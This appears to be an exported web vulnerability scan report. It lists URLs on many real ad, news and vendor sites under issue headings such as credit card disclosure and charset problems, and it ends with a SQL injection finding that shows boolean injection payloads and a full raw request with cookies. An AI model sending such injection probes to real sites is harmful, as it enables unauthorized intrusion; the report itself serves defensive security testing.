27.198. http://www.facebook.com/plugins/likebox.php

27.199. http://www.facebook.com/plugins/recommendations.php

27.200. http://www.facebook.com/plugins/recommendations.php

27.201. http://www.glam.com/logincheck.php

27.202. http://www.google.com/sdch/rU20-FBA.dct

27.203. http://www.realestate.com.au/

27.204. http://www.weichert.com/search/realestate/PropertyListing.aspx

27.205. http://www.wiseshop.com/shop.php

27.206. http://www35.glam.com/gad/glamadapt_jsrv.act

27.207. http://www35.glam.com/gad/glamadapt_jsrv.act

27.208. http://www35.glam.com/gad/glamadapt_jsrv.act

27.209. http://www35.glam.com/gad/glamadapt_jsrv.act

27.210. http://www35.glam.com/gad/glamadapt_jsrv.act

27.211. http://www35.glam.com/gad/glamadapt_jsrv.act

27.212. http://www35.glam.com/gad/glamadapt_jsrv.act

27.213. http://www35.glam.com/gad/glamadapt_jsrv.act

27.214. http://www35.glam.com/gad/glamadapt_jsrv.act

27.215. http://www35.glam.com/gad/glamadapt_jsrv.act

27.216. http://www35.glam.com/gad/glamadapt_jsrv.act

27.217. http://www35.glam.com/gad/glamadapt_jsrv.act

27.218. http://www35.glam.com/gad/glamadapt_jsrv.act

27.219. http://www35.glam.com/gad/glamadapt_jsrv.act

27.220. http://www35.glam.com/gad/glamadapt_jsrv.act

27.221. http://www35.glam.com/gad/glamadapt_jsrv.act

27.222. http://www35.glam.com/gad/glamadapt_jsrv.act

27.223. http://www35.glam.com/gad/glamadapt_jsrv.act

27.224. http://www35.glam.com/gad/glamadapt_jsrv.act

27.225. http://www35.glam.com/gad/glamadapt_jsrv.act

27.226. http://www35.glam.com/gad/glamadapt_jsrv.act

27.227. http://www35.glam.com/gad/glamadapt_jsrv.act

27.228. http://www35.glam.com/gad/glamadapt_jsrv.act

27.229. http://www35.glam.com/gad/glamadapt_jsrv.act

27.230. http://www35.glam.com/gad/glamadapt_jsrv.act

27.231. http://www35.glam.com/gad/glamadapt_jsrv.act

27.232. http://www35.glam.com/gad/glamadapt_jsrv.act

27.233. http://www35.glam.com/gad/glamadapt_jsrv.act

27.234. http://www35.glam.com/gad/glamadapt_jsrv.act

27.235. http://www35.glam.com/gad/glamadapt_jsrv.act

27.236. http://www35.glam.com/gad/glamadapt_jsrv.act

27.237. http://www35.glam.com/gad/glamadapt_jsrv.act

27.238. http://www35.glam.com/gad/glamadapt_jsrv.act

28. Credit card numbers disclosed

28.1. http://www.bing.com/search

28.2. http://www.businessspectator.com.au/bs.nsf/fmJobListings

28.3. http://www35.glam.com/gad/glamadapt_jsrv.act

29. Robots.txt file

29.1. http://0.gravatar.com/avatar/61d13e4c2715fc6728b56bf8031ea151

29.2. http://0.r.REDACTED.com/

29.3. http://050-uwt-888.mktoresp.com/webevents/visitWebPage

29.4. http://1.gravatar.com/avatar/b530ef61ccf43de890b51db56fe3b417

29.5. http://1077745.r.REDACTED.com/

29.6. http://198.136.211.12/

29.7. http://4qinvite.4q.iperceptions.com/1.aspx

29.8. http://595221.r.REDACTED.com/

29.9. http://656900.r.REDACTED.com/

29.10. http://954370.r.REDACTED.com/

29.11. http://a.dlqm.net/adscgen/log_ut_err.php

29.12. http://a1.bing4.com/imagenewsfetcher.aspx

29.13. http://a2.bing4.com/imagenewsfetcher.aspx

29.14. http://a3.bing4.com/imagenewsfetcher.aspx

29.15. http://ad-apac.doubleclick.net/adj/onl.age.news/national

29.16. http://ad.amgdgt.com/ads/

29.17. http://ad.au.doubleclick.net/adj/ndm.taus/news/nation

29.18. http://ad.linksynergy.com/fs-bin/show

29.19. http://ads.pointroll.com/PortalServe/

29.20. http://ads.specificmedia.com/serve/v=5

29.21. http://adx.g.doubleclick.net/pagead/adview

29.22. http://adx.hwtm.com/www/delivery/spcjs.php

29.23. http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js

29.24. http://api.bing.net/json.aspx

29.25. http://api.recaptcha.net/challenge

29.26. http://api.shopstyle.com/crossdomain.xml

29.27. http://api.twitter.com/1/statuses/user_timeline.json

29.28. http://arts.onbloglist.com/img12.php

29.29. http://au.myspace.com/

29.30. https://auth.tek.com/mytek/faces/loginregistration.jsp

29.31. http://b1.adbrite.com/mb/banner_shim.swf

29.32. http://beauty.glam.com/

29.33. http://c.brightcove.com/services/viewer/federated_f9

29.34. http://cache.specificmedia.com/creative/blank.gif

29.35. http://cdn.hostessblog.com/wp-includes/js/l10n.js

29.36. http://celebrities.glam.com/

29.37. http://check4.connect.facebook.com/ajax/v6.php

29.38. http://check4.facebook.com/ajax/v6.php

29.39. http://check6.connect.facebook.com/ajax/v6.php

29.40. http://check6.facebook.com/ajax/v6.php

29.41. http://cheetah.vizu.com/a.gif

29.42. http://clickserve.cc-dt.com/link/tplimage

29.43. https://clientcommunity.touchnet.com/web/dashboard.action

29.44. http://clk.pointroll.com/bc/

29.45. http://cx.trizetto.com/

29.46. http://delb.opt.fimserve.com/adopt/

29.47. http://demr.opt.fimserve.com/adopt/

29.48. http://desb.opt.fimserve.com/adopt/

29.49. http://designers.glam.com/2011/04/29/royal-wedding-style-what-the-guests-wore/

29.50. http://development.logrhythm.com/Portals/0/logrhythm_home_page.swf

29.51. http://e-sites2.tek.com/mytek/faces/startresource.jsp

29.52. http://enjmp.com/links/

29.53. http://entertainment.glam.com/

29.54. http://ev.ads.pointroll.com/event/

29.55. http://ev.ib-ibi.com/image.sbix

29.56. http://exch.quantserve.com/pixel/p-ebatsLBTInhYU.gif

29.57. http://feeds.feedburner.com/FashionableHousewife

29.58. http://flash.quantserve.com/quant.swf

29.59. http://fls.doubleclick.net/activityi

29.60. http://gan.doubleclick.net/gan_impression

29.61. http://googleads.g.doubleclick.net/pagead/ads

29.62. http://gw-services.vtrenz.net/WebCookies/iMAWebCookie.js

29.63. http://iar.worthathousandwords.com/iar.gif

29.64. http://idexperts.wufoo.com/embed/z7x4a3/def/embedKey=z7x4a3578302&referrer=

29.65. http://idexpertscorp.com/

29.66. http://images.trulia.com/images/tools/TruliaSnapshot.swf

29.67. http://leads.demandbase.com/in.php

29.68. http://living.glam.com/

29.69. http://loadus.exelator.com/load/

29.70. http://mm.chitika.net/minimall

29.71. http://news.9REDACTED.com.au/js/bld/lcm.js

29.72. http://news.REDACTED/national/8241327/migration-proposal-weak-abbott-says

29.73. http://nmp.newsgator.com/ngbuzz/buzz.ashx

29.74. http://oas.guardian.co.uk/RealMedia/ads/adstream_mjx.ads/www.guardian.co.uk/music/2011/may/01/ray-davies-kinks-meltdown-interview/oas.html/1203925231@Top,Middle2,Right1,x31

29.75. http://pixel.invitemedia.com/data_sync

29.76. http://pr.prchecker.info/getpr.php

29.77. http://puma.vizu.com/cdn/00/00/16/49/smart_tag.js

29.78. http://rad.REDACTED.com/ADSAdClient31.dll

29.79. http://s.youtube.com/s

29.80. http://s.ytimg.com/yt/swfbin/apiplayer3-vflDDA3kt.swf

29.81. http://search.twitter.com/search.json

29.82. http://speed.pointroll.com/PointRoll/Media/Banners/Hanes/863117/PTX_300x250_BF.jpg

29.83. http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US

29.84. http://static.ak.fbcdn.net/connect/xd_proxy.php

29.85. http://support.logrhythm.com/ics/support/default.asp

29.86. https://support.logrhythm.com/

29.87. http://t0.gstatic.com/images

29.88. http://t1.gstatic.com/images

29.89. http://tag.admeld.com/ad/json/100/glammedia/728x90/356541251

29.90. http://thumbs.trulia.com/crossdomain.xml

29.91. http://tracking.quisma.com/v.cfs

29.92. http://twitter.com/statuses/user_timeline/fashionablegal.json

29.93. http://twittercounter.com/counter/

29.94. http://v7.lscache6.c.youtube.com/videoplayback

29.95. http://vincentfretin.ecreall.com/articles/varnish-guru-meditation-on-timeout

29.96. http://whos.amung.us/pingjs/

29.97. http://www.abc.net.au/7.30/content/2011/s3200763.htm

29.98. http://www.afewgoodygumdrops.com/2011/04/few-goody-gumdrops-reviews-christian.html

29.99. http://www.awltovhc.com/image-2932836-10683942

29.100. http://www.blogger.com/dyn-css/authorization.css

29.101. http://www.blogtoplist.com/tracker.php

29.102. http://www.brisbanetimes.com.au/opinion/politics/blogs/gengreens/temporary-protection-visas-are-not-the-answer-20110427-1dwe3.html

29.103. http://www.connect.facebook.com/widgets/fan.php

29.104. http://www.dailytelegraph.com.au/news/breaking-news/tony-abbott-says-migration-proposals-are-weak/story-e6freuz0-1226045133021

29.105. http://www.facebook.com/plugins/like.php

29.106. http://www.flickr.com/badge_code_v2.gne

29.107. http://www.ftjcfx.com/image-2932836-10731270

29.108. http://www.giveawayscout.com/badge/badge_a

29.109. http://www.glam.com/

29.110. http://www.glam.de/

29.111. http://www.glammedia.com/about_glam/our_story/index.php

29.112. http://www.guardian.co.uk/music/2011/may/01/ray-davies-kinks-meltdown-interview

29.113. http://www.hipaa-101.com/

29.114. http://www.hipaasolutions.org/

29.115. http://www.hipaastore.com/

29.116. https://www.hipaastore.com/min/

29.117. http://www.hostessblog.com/2011/04/royal-wedding-theme-printables-part-2/

29.118. https://www.idexpertscorp.com/dbhc/

29.119. http://www.inspiredelearning.com/privacy/hipaa.privacy.security.htm

29.120. http://www.insurancemgr.com/ppc/health.php

29.121. http://www.islandpacket.com/2011/05/02/1640363/will-killing-osama-kill-the-movement.html

29.122. http://www.logrhythm.com/

29.123. http://www.myspace.com/serverSideIframeModifier.html

29.124. http://www.news.com.au/breaking-news/national/christmas-island-detainee-sews-lips-together/story-e6frfku9-1226044502823

29.125. http://www.nexica.com/error404.aspx

29.126. http://www.oli.co.uk/Maxi-Dresses/Productlist.stm

29.127. http://www.patlive.com/appointment-scheduling/

29.128. http://www.perthnow.com.au/news/western-australia/christmas-island-kill-accused-lashed-out-with-knife/story-e6frg13u-1226046333217

29.129. http://www.playtexbramakeover.com/

29.130. http://www.righthealth.com/topic/What_Is_Hipaa

29.131. http://www.servicemax.com/landing/adwords/aberdeen-scheduling.html

29.132. http://www.sfaxme.com/index.php

29.133. http://www.shadowtrack.com/index.php

29.134. http://www.shareasale.com/r.cfm

29.135. http://www.shopstyle.com/browse

29.136. http://www.simplyyours.co.uk/shop/nav/show.action

29.137. http://www.strausnews.com/articles/2011/05/02/warwick_advertiser/news/25.txt

29.138. http://www.stumbleupon.com/submit

29.139. http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.REDACTED.com|REDACTED.com/wonderwall|v14.REDACTED.com/|preview.REDACTED.com/|www.REDACTED.com/preview.aspx|mtv.com/videos/|mtv.com/

29.140. http://www.tek.com/

29.141. http://www.theage.com.au/national/christmas-island-action-adds-to-villawood-woes-20110425-1du6x.html

29.142. http://www.theaustralian.com.au/news/nation/abbott-a-hero-on-troubled-christmas-island/story-e6frg6nf-1226045245809

29.143. http://www.thehousehuntershandbook.com/public/listingSingle.do

29.144. http://www.theshophound.typepad.com/|http:/www.chicgalleria.com|http:/lastylistmom.com|http:/www.chicgirlstyle.com|http:/blog.sofiawean.com|http:/www.themakeupblogger.com|http:/www.fashioncocktail.com/|http:/theorganicbeautyexpert.typepad.com|http:/thesmartstylist.com|http:/www.dabagirls.com/|http:/www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.REDACTED.com|REDACTED.com/wonderwall|v14.REDACTED.com/|preview.REDACTED.com/|www.REDACTED.com/preview.aspx|mtv.com/videos/|mtv.com/

29.145. http://www.topcareerschools.com/s/279-390/12823153/

29.146. http://www.touchnet.com/web/display/TN/Home

29.147. http://www.tqlkg.com/image-2932836-10499952

29.148. http://www.trizetto.com/hpSolutions/hipaa.asp

29.149. http://www.truelocal.com.au/

29.150. http://www.trulia.com/syndication/

29.151. http://www.watoday.com.au/wa-news/hunger-strike-starts-on-christmas-island-20110427-1dw45.html

29.152. http://www.webhostingtalk.com/showthread.php

29.153. http://www.webmd.com/$|wonderwall.REDACTED.com|REDACTED.com/wonderwall|v14.REDACTED.com/|preview.REDACTED.com/|www.REDACTED.com/preview.aspx|mtv.com/videos/|mtv.com/

29.154. http://www.webmgr8.com/index.cfm

29.155. http://www.weichert.com/search/realestate/PropertyListing.aspx

29.156. http://www.youtube.com/apiplayer

29.157. http://www2.glam.com/app/site/affiliate/viewChannelModule.act

29.158. http://www2.idexpertscorp.com/

29.159. http://www2.tek.com/dcs5w0txb10000wocrvqy1nqm_6n1p/dcs.gif

29.160. http://www2b.abc.net.au/tmb/Client/MessageBoardList.aspx

29.161. http://www30a2-orig.glam.com/gad/urldata.act

29.162. http://www30a2.glam.com/gad/glamadapt_srv.act

29.163. http://xads.zedo.com/ads3/a

29.164. http://xml.west.REDACTED.overture.com/d/search/p/REDACTED/xml/en-au/v8/

29.165. http://yads.zedo.com/ads3/a

30. Cacheable HTTPS response

30.1. https://admin.iconnection.com/login.aspx

30.2. https://auth.tek.com/mytek/faces/forgotpassword.jsp

30.3. https://auth.tek.com/mytek/faces/loginregistration.jsp

30.4. https://clientcommunity.touchnet.com/web/rest/prototype/1/i18n/com.atlassian.confluence.keyboardshortcuts

30.5. https://clientcommunity.touchnet.com/web/rest/shortcuts/latest/shortcuts/2042/a8e084b1106ae904e4637c50bc8266c4

30.6. https://customer.trizetto.com/OnyxCustomerPortal/

30.7. https://customer.trizetto.com/OnyxCustomerPortal/banner.asp

30.8. https://customer.trizetto.com/OnyxCustomerPortal/home.asp

30.9. https://customer.trizetto.com/OnyxCustomerPortal/login.asp

30.10. https://customer.trizetto.com/OnyxCustomerPortal/menu.asp

30.11. https://idesk.infocrossing.com/

30.12. https://support.logrhythm.com/

30.13. https://support.logrhythm.com/ics/inc/js/portalAjaxGatewayConfig.js

30.14. https://support.logrhythm.com/ics/support/LeftSplash.asp

30.15. https://support.logrhythm.com/ics/support/accounts/5657/top(301116200971767).html

30.16. https://support.logrhythm.com/ics/support/default.asp

30.17. https://support.logrhythm.com/ics/support/mylogin.asp

30.18. https://tracker.i-structure.com/

30.19. https://www.idexpertscorp.com/RADAR/

30.20. https://www.idexpertscorp.com/dbhc/

30.21. https://www.idexpertscorp.com/membership/

30.22. https://www.medicare-solution.com/mss/home/Index.jsp

30.23. https://www1.gotomeeting.com/en_US/javaScriptTester.tmpl

31. HTML does not specify charset

31.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

31.2. http://480-adver-view.c3metrics.com/v.js

31.3. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.390

31.4. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.684

31.5. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.687

31.6. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.689

31.7. http://ad.doubleclick.net/adi/N5047.Turn/B5053148.22

31.8. http://ad.doubleclick.net/adi/N5956.Turn/B3941858.17

31.9. http://ad.doubleclick.net.68327.9418.302br.net/jsi/adi/N5047.Turn/B5053148.22

31.10. http://ad.yieldmanager.com/iframe3

31.11. http://ads-vrx.adbrite.com/adserver/display_iab_ads

31.12. http://ads.pointroll.com/PortalServe/

31.13. http://ads.shopstyle.com/

31.14. http://ads.shopstyle.com/sugar-ads/ism/data/

31.15. http://ads.shopstyle.com/sugar-ads/ism/js/

31.16. http://ads.specificmedia.com/serve/v=5

31.17. http://afe.specificclick.net/

31.18. http://altfarm.mediaplex.com/ad/js/13001-83639-12284-11

31.19. http://altfarm.mediaplex.com/ad/js/13966-95815-19269-5

31.20. http://amch.questionmarket.com/adscgen/st.php

31.21. http://bidder.mathtag.com/iframe/notify

31.22. http://bs.serving-sys.com/BurstingPipe/adServer.bs

31.23. http://c5.zedo.com/jsc/c5/ff2.html

31.24. http://content.pulse360.com/657ACDD4-3EC6-11E0-8CF0-ED05CB3AF435

31.25. http://d3.zedo.com/jsc/d3/ff2.html

31.26. http://enjmp.com/favicon.ico

31.27. http://enjmp.com/links/

31.28. http://enjmp.com/links/health-insurancemgr.php

31.29. http://fls.doubleclick.net/activityi

31.30. https://idesk.infocrossing.com/

31.31. https://idesk.infocrossing.com/favicon.ico

31.32. http://loadus.exelator.com/load/net.php

31.33. http://media.adfrontiers.com/pq

31.34. http://mediacdn.disqus.com/1304107721/build/system/def.html

31.35. http://mediacdn.disqus.com/1304107721/build/system/reply.html

31.36. http://mediacdn.disqus.com/1304107721/build/system/upload.html

31.37. http://mozo-widgets.f2.com.au/widgets/multiwidget3/SMH/FM-NEWS

31.38. http://mozo-widgets.f2.com.au/widgets/multiwidget3/TA/FM-NEWS

31.39. http://mozo-widgets.f2.com.au/widgets/multiwidget3/WAT/FM-NEWS

31.40. http://optimized-by.rubiconproject.com/a/7845/12566/22544-2.html

31.41. http://optimized-by.rubiconproject.com/a/7845/12566/22544-9.html

31.42. http://optimized-by.rubiconproject.com/a/7845/12566/26835-15.html

31.43. http://panel.kantarmedia.com/0/KantarMedia-Panel/panel/set_panel.html

31.44. http://pixel.invitemedia.com/data_sync

31.45. http://pixel.invitemedia.com/rubicon_sync

31.46. http://rebeccaminkoff.com/linkshare%20banners/classics%202010/RM_linkshare_classic_125x125.jpg

31.47. http://stats.townnews.com/strausnews.com/

31.48. http://stats.townnews.com/thesunchronicle.com/

31.49. https://support.logrhythm.com/

31.50. https://support.logrhythm.com/ics/support/accounts/5657/top(301116200971767).html

31.51. http://tag.contextweb.com/favicon.ico

31.52. http://tags.bluekai.com/site/2312

31.53. http://uac.advertising.com/wrapper/aceUACping.htm

31.54. http://www.abc.net.au/res/abc/submenus.htm

31.55. http://www.bing.com/social/socialwidget/fuse-montage-twitter-widget-v1.htm

31.56. http://www.blogtoplist.com/tracker.php

31.57. http://www.giveawayscout.com/badge/js/

31.58. http://www.glam.com/register

31.59. http://www.glammedia.com/publishers/glam_publisher_network/contract20090526_files/filelist.xml

31.60. http://www.insurancemgr.com/links/health.php

31.61. http://www.myspace.com/serverSideIframeModifier.html

31.62. http://www.news14charlotte.com/images/video/cart_play.gif

31.63. http://www.orgsites.com/md/church-crafts-and-activities/_modules.html

31.64. http://www.playtexbramakeover.com/

31.65. http://www.righthealth.com/javascripts/adore/ad2.html

31.66. http://www.strausnews.com/%22http://art/heading-bg.gif

31.67. http://www.strausnews.com/%22http://art/heading-bg1.gif

31.68. http://www.strausnews.com/%22http://art/page-hzbg.gif

31.69. http://www.strausnews.com/%22http://art/spacer.gif

31.70. http://www.strausnews.com/%22http://art/straus_logo.gif

31.71. http://www.strausnews.com/__utm.gif

31.72. http://www.strausnews.com/dining_guide/include/straus_special.css

31.73. http://www.strausnews.com/favicon.ico

31.74. http://www.tek.com/mytek/

31.75. http://www.thefashionablegal.com/wp-content/themes/lifestyle_40/leaderboard.php

31.76. http://www.thesunchronicle.com/art/mugs/siegel.jpg

31.77. http://www.trizetto.com/company/contactUs.asp

31.78. http://www.trizetto.com/company/corporateProfile.asp

31.79. http://www.trizetto.com/customerEntrance.asp

31.80. http://www.trizetto.com/hpSolutions/coreAdministration.asp

31.81. http://www.trizetto.com/hpSolutions/facets.asp

31.82. http://www.trizetto.com/hpSolutions/hipaa.asp

31.83. http://www.webmd.com/$|wonderwall.REDACTED.com|REDACTED.com/wonderwall|v14.REDACTED.com/|preview.REDACTED.com/|www.REDACTED.com/preview.aspx|mtv.com/videos/|mtv.com/

31.84. http://www15.glam.com/glamIgm.act

31.85. http://www15.glam.com/template/glamtv_199269041.php

31.86. http://www30a2.glam.com/gad/click.act

31.87. http://www30a2.glam.com/gad/noscript.act

31.88. http://xads.zedo.com/ads3/a

31.89. http://xss.cx/2011/05/02/dork/sql-injection-database-error-cwe89-capec66-dork-ghdb-www2idexpertscorpcom.html

31.90. http://yads.zedo.com/ads3/a

32. HTML uses unrecognised charset

33. Content type incorrectly stated

33.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

33.2. http://480-adver-view.c3metrics.com/v.js

33.3. http://a.rad.REDACTED.com/ADSAdClient31.dll

33.4. http://ads.pointroll.com/PortalServe/

33.5. http://ads.shopstyle.com/

33.6. http://ads.shopstyle.com/sugar-ads/ism/data/

33.7. http://ads.shopstyle.com/sugar-ads/ism/js/

33.8. http://afe.specificclick.net/

33.9. http://altfarm.mediaplex.com/ad/js/13001-83639-12284-11

33.10. http://altfarm.mediaplex.com/ad/js/13966-95815-19269-5

33.11. http://amch.questionmarket.com/adscgen/st.php

33.12. http://ar.voicefive.com/b/rc.pli

33.13. http://arts.onbloglist.com/img12.php

33.14. http://b.rad.REDACTED.com/ADSAdClient31.dll

33.15. http://bs.serving-sys.com/BurstingPipe/adServer.bs

33.16. http://cdn.doubleverify.com/966952&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=6&plc=1278397&sid=glamcom&adid=

33.17. http://cdn.doubleverify.com/966952&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=6&plc=1278398&sid=glamcom&adid=

33.18. http://cdn.doubleverify.com/966952&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=6&plc=1278431&sid=quantcas&adid=

33.19. https://clientcommunity.touchnet.com/web/rest/prototype/1/i18n/com.atlassian.confluence.keyboardshortcuts

33.20. http://clients1.google.com/complete/search

33.21. http://content.pulse360.com/657ACDD4-3EC6-11E0-8CF0-ED05CB3AF435

33.22. http://d3fd89.r.axf8.net/mr/a.gif

33.23. http://data.REDACTED/ugc/UGCPortal.aspx

33.24. http://delb.opt.fimserve.com/adopt/

33.25. http://engine.cmmeglobal.com/v1/request

33.26. http://event.adxpose.com/event.flow

33.27. http://feed.video.news.com.au/f/g5OqK/nr5Z4uX_htDc/1895483445

33.28. http://feed.video.news.com.au/f/g5OqK/nr5Z4uX_htDc/1905619982

33.29. http://feeds.glam.com/blogs/latest/

33.30. http://feeds.glam.com/blogs/latest/Beauty

33.31. http://feeds.glam.com/blogs/latest/Fashion

33.32. http://jobs.orbitcast.com/a/jbb/find-jobs-json/jbb_widget_list_jobposts/5

33.33. http://js.worthathousandwords.com/IA.jsh

33.34. http://lp.idexpertscorp.com/hitech-whitepapera/bg-grad-fade-edge-ul.original.png

33.35. http://mediacdn.disqus.com/1304107721/fonts/disqus-webfont.woff

33.36. http://mediaforce.sitescout.netdna-cdn.com/ad150-594280c.jpg

33.37. http://ndm.feeds.theplatform.com/ps/JSON/PortalService/2.1/getReleaseList

33.38. http://news.REDACTED/flock/flock44.aspx

33.39. http://news.REDACTED/flock/flockupdate.aspx

33.40. http://news.xinhuanet.com/favicon.ico

33.41. http://REDACTED/share/com/header_v10/renderPersonalisation.aspx

33.42. http://rad.REDACTED.com/ADSAdClient31.dll

33.43. http://resources.news.com.au/cs/dailytelegraph/images/favicon.ico

33.44. http://resources.news.com.au/cs/newscomau/images/favicon.ico

33.45. http://resources.news.com.au/cs/perthnow/images/favicon.ico

33.46. http://resources.news.com.au/cs/theaustralian/images/favicon.ico

33.47. http://resources1.news.com.au/images/2011/04/29/1226046/937813-house-for-sale-signs.gif

33.48. http://rt.disqus.com/forums/realtime-cached.js

33.49. https://support.logrhythm.com/ics/inc/js/portalAjaxGatewayConfig.js

33.50. http://vms.REDACTED.com/vms.aspx

33.51. http://whos.amung.us/pingjs/

33.52. http://widget.linkwithin.com/show_widget

33.53. http://widget2.linkwithin.com/show_widget

33.54. http://www.abc.net.au/favicon.ico

33.55. http://www.abc.net.au/res/abc/submenus.htm

33.56. http://www.blogtoplist.com/tracker.php

33.57. http://www.brisbanetimes.com.au/action/pingServerAction

33.58. http://www.brisbanetimes.com.au/favicon.ico

33.59. http://www.facebook.com/extern/login_status.php

33.60. http://www.giveawayscout.com/badge/js/

33.61. http://www.glam.com/logincheck.php

33.62. http://www.google.com/realtimejs

33.63. http://www.google.com/recaptcha/api/reload

33.64. http://www.google.com/search

33.65. https://www.idexpertscorp.com/RADAR/

33.66. https://www.idexpertscorp.com/dbhc/

33.67. http://www.isecauditors.com/images/favicon.ico

33.68. http://www.isecauditors.com/images/fondo_isec.jpg

33.69. http://www.medicare-solution.com/favicon.ico

33.70. http://www.orgsites.com/az/marchingrams/Doc1.docx

33.71. http://www.orgsites.com/ca/buddhism/boddhis.jpg

33.72. http://www.orgsites.com/il/rlmscheer/IMG_20110109_144130.jpg

33.73. http://www.orgsites.com/images/bg/bg31.gif

33.74. http://www.orgsites.com/md/church-crafts-and-activities/mountain_and_lake.jpg

33.75. http://www.orgsites.com/ny/bellporthighschoolptsa/April.WMF

33.76. http://www.orgsites.com/ny/bellporthighschoolptsa/Spring.WMF

33.77. http://www.orgsites.com/tx/americanlegion-post-unit-121/auxemb.jpg

33.78. http://www.orgsites.com/tx/txredhatroadrunners/j0424646.wmf

33.79. http://www.smh.com.au/action/pingServerAction

33.80. http://www.smh.com.au/favicon.ico

33.81. http://www.tek.com/cgi-bin/form/form.cgi

33.82. http://www.theage.com.au/action/pingServerAction

33.83. http://www.theage.com.au/favicon.ico

33.84. http://www.touchnet.com/web/rest/prototype/1/i18n/com.atlassian.confluence.keyboardshortcuts

33.85. http://www.trulia.com/homeroll/MA/Rehoboth/

33.86. http://www.vpswebserver.com/livezilla/server.php

33.87. http://www.watoday.com.au/action/pingServerAction

33.88. http://www.wiseshop.com/favicon.ico

33.89. http://www.wiseshop.com/includes/fonts/delicious-bold-webfont.woff

33.90. http://www.wiseshop.com/includes/fonts/delicious-heavy-webfont.woff

33.91. http://www.wiseshop.com/includes/fonts/delicious-roman-webfont.woff

33.92. http://www.wiseshop.com/solo/ajax/likes

33.93. http://www.xinhuanet.com/english2010/static/check.js

33.94. https://www1.gotomeeting.com/en_US/javaScriptTester.tmpl

33.95. http://www15.glam.com/glamIgm.act

33.96. http://www2.idexpertscorp.com/favicon.ico

33.97. http://www24a.glam.com/appdir/resources/rendergadget.js

33.98. http://www25.glam.com/appdir/resources/rendergadget.js

33.99. http://www3.tinker.com/event_timeline/

33.100. http://www35.glam.com/favicon.ico

33.101. http://www35t.glam.com/favicon.ico

33.102. http://www4.tinker.com/standard/event_timeline/

34. Content type is not specified

34.1. http://ad.yieldmanager.com/st

34.2. http://media.trafficmp.com/a/js

34.3. http://pcm1.map.pulsemgr.com/uds/pc

34.4. http://pcm2.map.pulsemgr.com/uds/pc

34.5. http://pcm3.map.pulsemgr.com/uds/pc

34.6. http://www.ucafunds.com.au/ugf/x27

34.7. http://www25.glam.com/files/gadget-store/installs/84371626942385/flvpath_2-73131245.flv



1. SQL injection
There are 43 instances of this issue:


1.1. http://ads2.adbrite.com/v0/ad [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ads2.adbrite.com
Path:   /v0/ad

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /v0/ad?sid=1545288&zs=3732385f3930&ifr=1&ref=http%3A%2F%2Fwww.dailytelegraph.com.au%2Fnews%2Fbreaking-news%2Ftony-abbott-says-migration-proposals-are-weak%2Fstory-e6freuz0-1226045133021%3Ffrom%3Dpublic_rss&zx=1020&zy=22&ww=1041&wh=903&fl=1&1%20and%201%3d1--%20=1 HTTP/1.1
Host: ads2.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.dailytelegraph.com.au/news/breaking-news/tony-abbott-says-migration-proposals-are-weak/story-e6freuz0-1226045133021?from=public_rss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; srh="1%3Aq64FAA%3D%3D"; ut="1%3AXZBJEoMgEEXvwpoFQxwqtxFBJSJGQS21vXswxlTM9v33u7p7RSND9xXVap7aXjp0R3lVpWVHshFoZ0rfAAOBndaWB9AIkgAFAvRRE4LzykY1i3x5RCq4TOKu48sUSMp7EwiNTq9oL95Jmwt1RhkTiPBTCwnEgn9F%2B1c3sZ7j204lGcy%2B16nq6DozYzLb76lSd6w%2FtAQ75noK9DkX1kKIqV8%2B%2FTjJf%2FsII5FZq3r9%2FhDathc%3D"; b="%3A%3Ax4cw%2Cx4co%2Cx4cn%2C12gg8%2C12ggb%2C6e73"; 